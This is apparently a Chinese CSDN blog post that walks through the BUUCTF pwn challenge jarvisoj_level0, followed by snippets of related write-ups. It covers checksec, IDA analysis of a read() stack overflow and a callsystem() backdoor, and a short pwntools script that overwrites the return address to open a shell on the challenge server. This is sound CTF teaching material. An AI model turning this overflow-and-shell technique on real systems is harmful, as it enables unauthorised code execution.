jarvisoj_level0

最新推荐文章于 2025-04-15 21:53:29 发布
最新推荐文章于 2025-04-15 21:53:29 发布
阅读量666 收藏 1
点赞数
分类专栏: 菜狗子pwn 文章标签: pwn linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_56301399/article/details/125919313
版权

文章目录

一、查看文件信息

先file ./level0查看文件类型再checksec --file=level0检查一下文件保护情况。
在这里插入图片描述
在这里插入图片描述
我还是觉得查看保护机制在gdb里顺眼一点:
在这里插入图片描述
信息就了解他是64位即可。

二、IDA反编译

main函数信息:
在这里插入图片描述这里再去看vulnerable_function()函数:
在这里插入图片描述
双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。
在这里插入图片描述在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。
在这里插入图片描述在这里插入图片描述

三、代码构造

buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。

from pwn import *
# remote()建立远程连接,指明ip和port
io = remote('node4.buuoj.cn', 28566)
payload = b'a'*(0x80 + 0x8) + p64(0x400596)
io.sendline(payload) #发送数据
io.interactive() #与shell进行交互

在这里插入图片描述
在这里插入图片描述

【BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 774
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 388
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 572
[buuctf]jarvisoj_level0
jarvisoj_level2_x64 1(64位ROP,栈溢出)
最新发布
Snk0xHeart的博客
04-15 286
开虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译调用了vulnerable_function函数,其他没啥,点进去看看还是没啥,点进缓冲区buf看看完整代码如下,buf对应第9行buf栈溢出吗?先数一下吧,offset=8*16+8=136然后按Shift+F12找后门函数找到一个system,一个/bin/sh,但是点进去没啥东西的。
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 257
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 433
Buu CTF PWNjarvisoj_level0的WriteUp
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 574
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
jarvisOJ-level0
qq_35661990的博客
09-28 340
jarvisOJ上的题目梯度似乎比pwnable.tw上的题目更合理点,pwnable.kr目前做的十几题都是考察各种基础,只有少数像pwn题。 level0是考最基础的ROP 先把下载的文件放进IDA里看看 .text:00000000004005C6 main proc near ; DATA XREF: _start+1D↑o .te...
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2437
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
buuctf之jarvisoj_level0
weixin_54452942的博客
03-28 1500
64位(system_addr+1)的奥秘
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值